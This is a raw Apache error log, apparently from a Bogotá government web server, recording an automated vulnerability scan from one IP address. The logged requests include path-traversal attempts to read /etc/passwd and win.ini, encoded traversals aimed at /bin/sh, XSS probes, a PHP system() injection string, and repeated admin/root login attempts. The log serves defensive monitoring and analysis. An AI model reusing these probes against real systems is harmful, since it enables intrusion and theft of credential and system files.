[Thu Jun 02 05:36:56.177072 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:45870] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:56.301873 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:45906] AH00126: Invalid URI in request POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
[Thu Jun 02 05:36:56.426673 2022] [cgi:error] [pid 8808:tid 21212] [client 46.101.1.185:45940] script not found or unable to stat: E:/nuevo/cgi-bin/execute_cmd.cgi
[Thu Jun 02 05:36:56.598273 2022] [cgi:error] [pid 8808:tid 20808] [client 46.101.1.185:45974] script not found or unable to stat: E:/nuevo/cgi-bin/slogin
[Thu Jun 02 05:36:56.754273 2022] [cgi:error] [pid 8808:tid 20944] [client 46.101.1.185:46016] script not found or unable to stat: E:/nuevo/cgi-bin/wapopen
[Thu Jun 02 05:36:56.910274 2022] [core:error] [pid 8808:tid 20944] [client 46.101.1.185:46042] AH00135: Invalid method in request info
[Thu Jun 02 05:36:56.910274 2022] [authz_core:error] [pid 8808:tid 21272] [client 46.101.1.185:46048] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Thu Jun 02 05:36:56.910274 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:46050] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 02 05:36:56.941474 2022] [core:error] [pid 8808:tid 20576] [client 46.101.1.185:46060] AH00126: Invalid URI in request GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1
[Thu Jun 02 05:36:57.222274 2022] [cgi:error] [pid 8808:tid 21244] [client 46.101.1.185:46114] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://ambientic.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:57.237874 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:46118] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 05:36:57.253474 2022] [core:error] [pid 8808:tid 21280] [client 46.101.1.185:46130] AH00126: Invalid URI in request GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Thu Jun 02 05:36:57.300274 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:46146] AH00126: Invalid URI in request GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1
[Thu Jun 02 05:36:57.331474 2022] [cgi:error] [pid 8808:tid 21160] [client 46.101.1.185:46150] script not found or unable to stat: E:/nuevo/cgi-bin/jarrewrite.sh
[Thu Jun 02 05:36:57.331474 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:46154] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:36:57.534275 2022] [cgi:error] [pid 8808:tid 21212] [client 46.101.1.185:46192] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://ambientic.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:57.659075 2022] [cgi:error] [pid 8808:tid 20552] [client 46.101.1.185:46232] script not found or unable to stat: E:/nuevo/cgi-bin/system_log.cgi
[Thu Jun 02 05:36:57.971076 2022] [core:error] [pid 8808:tid 20576] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:46308] AH00127: Cannot map GET /%20../web-inf/ HTTP/1.1 to file
[Thu Jun 02 05:36:58.111476 2022] [cgi:error] [pid 8808:tid 20520] [client 46.101.1.185:46338] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:58.189476 2022] [cgi:error] [pid 8808:tid 20576] [client 46.101.1.185:46350] script not found or unable to stat: E:/nuevo/cgi-bin/mainfunction.cgi
[Thu Jun 02 05:36:58.439076 2022] [core:error] [pid 8808:tid 21072] [client 46.101.1.185:46412] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:58.548277 2022] [cgi:error] [pid 8808:tid 21052] [client 46.101.1.185:46438] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 02 05:36:58.610677 2022] [core:error] [pid 8808:tid 20576] [client 46.101.1.185:46458] AH00126: Invalid URI in request GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:58.813477 2022] [authz_core:error] [pid 8808:tid 20840] [client 46.101.1.185:46494] AH01630: client denied by server configuration: E:/nuevo/htdocs/xampp/phpmyadmin
[Thu Jun 02 05:36:58.969477 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:46546] AH00126: Invalid URI in request GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1, referer: ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:59.016277 2022] [negotiation:error] [pid 8808:tid 20808] [client 46.101.1.185:46550] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:36:59.031877 2022] [negotiation:error] [pid 8808:tid 21144] [client 46.101.1.185:46552] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_METHOD_NOT_ALLOWED.html.var
[Thu Jun 02 05:36:59.047477 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:46562] script not found or unable to stat: E:/nuevo/cgi-bin/logoff.cgi
[Thu Jun 02 05:36:59.125478 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:46572] script not found or unable to stat: E:/nuevo/htdocs/WEBACCOUNT.CGI
[Thu Jun 02 05:36:59.187878 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:46596] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi
[Thu Jun 02 05:36:59.453078 2022] [core:error] [pid 8808:tid 20568] [client 46.101.1.185:46656] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:36:59.453078 2022] [authz_core:error] [pid 8808:tid 20840] [client 46.101.1.185:46654] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/setup/index.php
[Thu Jun 02 05:36:59.593478 2022] [core:error] [pid 8808:tid 20852] [client 46.101.1.185:46700] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:36:59.843079 2022] [core:error] [pid 8808:tid 20576] [client 46.101.1.185:46760] AH00126: Invalid URI in request GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:59.858679 2022] [cgi:error] [pid 8808:tid 21052] [client 46.101.1.185:46766] script not found or unable to stat: E:/nuevo/cgi-bin/mj_wwwusr
[Thu Jun 02 05:37:00.170679 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:46844] script not found or unable to stat: E:/nuevo/cgi-bin/manlist
[Thu Jun 02 05:37:00.747880 2022] [authz_core:error] [pid 8808:tid 20900] [client 46.101.1.185:46984] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/server_import.php
[Thu Jun 02 05:37:01.059881 2022] [authz_core:error] [pid 8808:tid 21052] [client 46.101.1.185:47060] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin 2
[Thu Jun 02 05:37:01.169081 2022] [cgi:error] [pid 8808:tid 20704] [client 46.101.1.185:47084] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:37:01.231481 2022] [cgi:error] [pid 8808:tid 20552] [client 46.101.1.185:47096] script not found or unable to stat: E:/nuevo/cgi-bin/privatekey.pem
[Thu Jun 02 05:37:01.434282 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:47146] script not found or unable to stat: E:/nuevo/cgi-bin/jarrewrite.sh
[Thu Jun 02 05:37:01.449882 2022] [core:error] [pid 8808:tid 20520] [client 46.101.1.185:47154] AH00126: Invalid URI in request GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:01.605882 2022] [cgi:error] [pid 8808:tid 20520] [client 46.101.1.185:47184] script not found or unable to stat: E:/nuevo/cgi-bin/config.exp
[Thu Jun 02 05:37:01.761882 2022] [cgi:error] [pid 8808:tid 20852] [client 46.101.1.185:47220] script not found or unable to stat: E:/nuevo/htdocs/passwordrecovered.cgi
[Thu Jun 02 05:37:01.902282 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:47252] script not found or unable to stat: E:/nuevo/cgi-bin/Maconomy
[Thu Jun 02 05:37:02.198683 2022] [negotiation:error] [pid 8808:tid 20704] [client 46.101.1.185:47318] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_METHOD_NOT_ALLOWED.html.var
[Thu Jun 02 05:37:02.323483 2022] [cgi:error] [pid 8808:tid 20840] [client 46.101.1.185:47344] script not found or unable to stat: E:/nuevo/cgi-bin/awstats
[Thu Jun 02 05:37:02.354683 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:47354] script not found or unable to stat: E:/nuevo/cgi-bin/manlist
[Thu Jun 02 05:37:02.385883 2022] [core:error] [pid 8808:tid 21280] [client 46.101.1.185:47366] AH00126: Invalid URI in request GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1, referer: portal.ambientebogota.gov.co:80
[Thu Jun 02 05:37:02.697884 2022] [cgi:error] [pid 8808:tid 20576] [client 46.101.1.185:47428] script not found or unable to stat: E:/nuevo/htdocs/index.asp
[Thu Jun 02 05:37:02.807084 2022] [cgi:error] [pid 8808:tid 21212] [client 46.101.1.185:47444] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:37:02.807084 2022] [cgi:error] [pid 8808:tid 20852] [client 46.101.1.185:47446] script not found or unable to stat: E:/nuevo/cgi-bin/cgiServer.exx
[Thu Jun 02 05:37:02.963084 2022] [authz_core:error] [pid 8808:tid 21004] [client 46.101.1.185:47470] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Thu Jun 02 05:37:03.119085 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:47506] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:37:03.165885 2022] [core:error] [pid 8808:tid 20900] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:47516] AH00127: Cannot map GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1 to file
[Thu Jun 02 05:37:03.165885 2022] [cgi:error] [pid 8808:tid 20852] [client 46.101.1.185:47518] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:37:03.493485 2022] [core:error] [pid 8808:tid 21212] [client 46.101.1.185:47578] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Thu Jun 02 05:37:03.493485 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:47576] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://portal.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:37:03.602685 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:47598] script not found or unable to stat: E:/nuevo/cgi-bin/supportInstaller
[Thu Jun 02 05:37:03.805486 2022] [core:error] [pid 8808:tid 20592] [client 46.101.1.185:47632] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Thu Jun 02 05:37:03.805486 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:47634] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://portal.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:37:04.257887 2022] [core:error] [pid 8808:tid 20920] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:47720] AH00127: Cannot map GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2A18y4S7PSqWvwY0qfKgzgBdyN0')%3elujb7/admin/imgProcess.cfm HTTP/1.1 to file
[Thu Jun 02 05:37:04.554287 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:47762] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Thu Jun 02 05:37:05.178288 2022] [cgi:error] [pid 8808:tid 20900] [client 46.101.1.185:47864] script not found or unable to stat: E:/nuevo/cgi-bin/supportInstaller
[Thu Jun 02 05:37:05.911489 2022] [core:error] [pid 8808:tid 20708] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:47990] AH00127: Cannot map POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 to file
[Thu Jun 02 05:37:06.129890 2022] [negotiation:error] [pid 8808:tid 21160] [client 46.101.1.185:48020] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:06.473090 2022] [cgi:error] [pid 8808:tid 21212] [client 46.101.1.185:48076] script not found or unable to stat: E:/nuevo/cgi-bin/manlist
[Thu Jun 02 05:37:06.800691 2022] [core:error] [pid 8808:tid 21016] (20025)The given path contained wildcard characters: [client 46.101.1.185:48120] AH00036: access to /s=set&_method=__construct&method=*&filter[]=system failed (filesystem path 'E:/nuevo/htdocs/s=set&_method=__construct&method=*&filter[]=system')
[Thu Jun 02 05:37:06.800691 2022] [negotiation:error] [pid 8808:tid 20576] [client 46.101.1.185:48118] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:07.237492 2022] [authz_core:error] [pid 8808:tid 21232] [client 46.101.1.185:48176] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Thu Jun 02 05:37:07.705493 2022] [core:error] [pid 8808:tid 20568] [client 46.101.1.185:47432] AH00126: Invalid URI in request helo target
[Thu Jun 02 05:37:07.923893 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48280] AH00126: Invalid URI in request GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:37:08.001893 2022] [core:error] [pid 8808:tid 20704] [client 46.101.1.185:48290] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:08.235894 2022] [cgi:error] [pid 8808:tid 21280] [client 46.101.1.185:48326] script not found or unable to stat: E:/nuevo/cgi-bin/execute_cmd.cgi
[Thu Jun 02 05:37:08.376294 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:48348] AH00126: Invalid URI in request GET /loginLess/../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:08.984695 2022] [core:error] [pid 8808:tid 21052] [client 46.101.1.185:48426] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:09.125095 2022] [authz_core:error] [pid 8808:tid 21144] [client 46.101.1.185:48440] AH01630: client denied by server configuration: E:/nuevo/htdocs/xampp/phpmyadmin
[Thu Jun 02 05:37:09.296695 2022] [core:error] [pid 8808:tid 21004] [client 46.101.1.185:48458] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:09.608696 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48494] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:09.655496 2022] [cgi:error] [pid 8808:tid 21004] [client 46.101.1.185:48502] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 05:37:09.764696 2022] [authz_core:error] [pid 8808:tid 21052] [client 46.101.1.185:48514] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/setup/index.php
[Thu Jun 02 05:37:09.920696 2022] [core:error] [pid 8808:tid 21052] [client 46.101.1.185:48528] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:10.139097 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:48556] script not found or unable to stat: E:/nuevo/cgi-bin/login
[Thu Jun 02 05:37:10.232697 2022] [core:error] [pid 8808:tid 20528] [client 46.101.1.185:48566] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:10.560298 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48604] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:10.560298 2022] [cgi:error] [pid 8808:tid 20956] [client 46.101.1.185:48606] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:37:10.763098 2022] [cgi:error] [pid 8808:tid 21212] [client 46.101.1.185:48630] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:37:10.872298 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:48642] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:10.965898 2022] [negotiation:error] [pid 8808:tid 20592] [client 46.101.1.185:48658] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:37:11.075099 2022] [cgi:error] [pid 8808:tid 21004] [client 46.101.1.185:48666] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:37:11.184299 2022] [core:error] [pid 8808:tid 20912] [client 46.101.1.185:48678] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:11.496299 2022] [core:error] [pid 8808:tid 20592] [client 46.101.1.185:48714] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:11.543099 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:48720] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 05:37:11.652300 2022] [cgi:error] [pid 8808:tid 21272] [client 46.101.1.185:48734] script not found or unable to stat: E:/nuevo/htdocs/man.cgi
[Thu Jun 02 05:37:11.714700 2022] [cgi:error] [pid 8808:tid 20912] [client 46.101.1.185:48740] script not found or unable to stat: E:/nuevo/htdocs/free_time.cgi
[Thu Jun 02 05:37:11.808300 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48750] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:11.917500 2022] [cgi:error] [pid 8808:tid 21160] [client 46.101.1.185:48766] script not found or unable to stat: E:/nuevo/cgi-bin/status
[Thu Jun 02 05:37:12.073500 2022] [core:error] [pid 8808:tid 21160] [client 46.101.1.185:48782] AH00126: Invalid URI in request GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1
[Thu Jun 02 05:37:12.120300 2022] [core:error] [pid 8808:tid 20912] [client 46.101.1.185:48788] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:12.447901 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48830] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:12.603901 2022] [core:error] [pid 8808:tid 20708] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:48850] AH00127: Cannot map GET /%0A/example.com/ HTTP/1.1 to file
[Thu Jun 02 05:37:12.759901 2022] [core:error] [pid 8808:tid 20912] [client 46.101.1.185:48868] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:13.071902 2022] [core:error] [pid 8808:tid 21004] [client 46.101.1.185:48908] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:13.383903 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48948] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:13.649103 2022] [core:error] [pid 8808:tid 20996] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:48982] AH00127: Cannot map GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2A192Td4nKDLbLU01OOgRKKEhEG')%3elujb7/admin/imgProcess.cfm HTTP/1.1 to file
[Thu Jun 02 05:37:13.711503 2022] [core:error] [pid 8808:tid 20528] [client 46.101.1.185:48990] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:13.711503 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:48994] AH00126: Invalid URI in request GET ///////../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:13.976704 2022] [cgi:error] [pid 8808:tid 20996] [client 46.101.1.185:49024] script not found or unable to stat: E:/nuevo/cgi-bin/weblogin.cgi
[Thu Jun 02 05:37:14.023504 2022] [core:error] [pid 8808:tid 20528] [client 46.101.1.185:49030] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:14.335504 2022] [core:error] [pid 8808:tid 21160] [client 46.101.1.185:49072] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:14.351104 2022] [core:error] [pid 8808:tid 20912] [client 46.101.1.185:49076] AH00126: Invalid URI in request GET ///../app.js HTTP/1.1
[Thu Jun 02 05:37:14.647505 2022] [core:error] [pid 8808:tid 20592] [client 46.101.1.185:49112] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:14.959505 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:49152] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:15.193506 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:49180] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:37:15.271506 2022] [core:error] [pid 8808:tid 21072] [client 46.101.1.185:49190] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:15.505506 2022] [core:error] [pid 8808:tid 21072] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:49218] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1 to file
[Thu Jun 02 05:37:15.599106 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:49226] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:15.911107 2022] [core:error] [pid 8808:tid 21052] [client 46.101.1.185:49262] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:16.223108 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:49298] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:16.550708 2022] [core:error] [pid 8808:tid 21004] [client 46.101.1.185:49338] AH00135: Invalid method in request info
[Thu Jun 02 05:37:16.706708 2022] [core:error] [pid 8808:tid 20840] [client 46.101.1.185:49350] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:16.878309 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:49374] AH00135: Invalid method in request info
[Thu Jun 02 05:37:17.720710 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:49458] AH00126: Invalid URI in request GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1
[Thu Jun 02 05:37:17.829910 2022] [cgi:error] [pid 8808:tid 20552] [client 46.101.1.185:49466] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:37:18.017111 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:49482] AH00126: Invalid URI in request GET /./../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:18.032711 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:49484] script not found or unable to stat: E:/nuevo/cgi-bin/GetSrvInfo.exe
[Thu Jun 02 05:37:18.188711 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:49502] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi
[Thu Jun 02 05:37:18.360311 2022] [core:error] [pid 8808:tid 21004] [client 46.101.1.185:49518] AH00135: Invalid method in request info
[Thu Jun 02 05:37:18.469512 2022] [core:error] [pid 8808:tid 20608] [client 46.101.1.185:49528] AH00126: Invalid URI in request GET /../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:18.500712 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:49532] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi
[Thu Jun 02 05:37:19.904714 2022] [cgi:error] [pid 8808:tid 20528] [client 46.101.1.185:49678] script not found or unable to stat: E:/nuevo/cgi-bin/libagent.cgi
[Thu Jun 02 05:37:20.076314 2022] [cgi:error] [pid 8808:tid 20528] [client 46.101.1.185:49698] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:37:20.216715 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:49714] script not found or unable to stat: E:/nuevo/cgi-bin/file_transfer.cgi
[Thu Jun 02 05:37:20.263515 2022] [core:error] [pid 8808:tid 20608] [client 46.101.1.185:49718] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:20.481915 2022] [core:error] [pid 8808:tid 20912] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:49738] AH00127: Cannot map GET /hsqldb%0a HTTP/1.1 to file
[Thu Jun 02 05:37:20.497515 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:49742] script not found or unable to stat: E:/nuevo/htdocs/appGet.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:37:20.528715 2022] [core:error] [pid 8808:tid 20816] [client 46.101.1.185:49750] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:20.575515 2022] [core:error] [pid 8808:tid 21160] [client 46.101.1.185:49754] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:20.715915 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:49770] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Thu Jun 02 05:37:20.856316 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:49784] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:37:20.887516 2022] [core:error] [pid 8808:tid 20608] [client 46.101.1.185:49788] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:21.199516 2022] [core:error] [pid 8808:tid 20840] [client 46.101.1.185:49814] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:21.355517 2022] [cgi:error] [pid 8808:tid 20816] [client 46.101.1.185:49828] script not found or unable to stat: E:/nuevo/htdocs/login.cgi
[Thu Jun 02 05:37:21.511517 2022] [core:error] [pid 8808:tid 21160] [client 46.101.1.185:49842] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:21.527117 2022] [negotiation:error] [pid 8808:tid 21244] [client 46.101.1.185:49844] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:21.667517 2022] [core:error] [pid 8808:tid 20952] [client 46.101.1.185:49854] AH00126: Invalid URI in request GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:37:21.839117 2022] [core:error] [pid 8808:tid 20952] [client 46.101.1.185:49870] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:21.839117 2022] [negotiation:error] [pid 8808:tid 20608] [client 46.101.1.185:49872] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:22.151118 2022] [core:error] [pid 8808:tid 20592] [client 46.101.1.185:49896] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:22.151118 2022] [negotiation:error] [pid 8808:tid 20816] [client 46.101.1.185:49898] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:22.275918 2022] [cgi:error] [pid 8808:tid 21160] [client 46.101.1.185:49904] script not found or unable to stat: E:/nuevo/htdocs/command.cgi
[Thu Jun 02 05:37:22.400718 2022] [core:error] [pid 8808:tid 20840] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:49920] AH00127: Cannot map GET /\\u001B]8;;https://example.com"/onmouseover="alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1 to file
[Thu Jun 02 05:37:22.463119 2022] [core:error] [pid 8808:tid 20608] [client 46.101.1.185:49926] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:22.463119 2022] [negotiation:error] [pid 8808:tid 20552] [client 46.101.1.185:49928] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:22.775119 2022] [core:error] [pid 8808:tid 20816] [client 46.101.1.185:49952] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:22.775119 2022] [negotiation:error] [pid 8808:tid 21144] [client 46.101.1.185:49954] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:23.087120 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:49972] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:23.102720 2022] [negotiation:error] [pid 8808:tid 20592] [client 46.101.1.185:49974] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:37:23.399120 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:49992] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:23.726721 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:50012] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:24.038721 2022] [core:error] [pid 8808:tid 20816] [client 46.101.1.185:50034] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:37:24.350722 2022] [core:error] [pid 8808:tid 20592] [client 46.101.1.185:50056] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:37:24.834323 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:50090] AH00126: Invalid URI in request GET /../../../../../../../../../etc/passwd HTTP/1.1
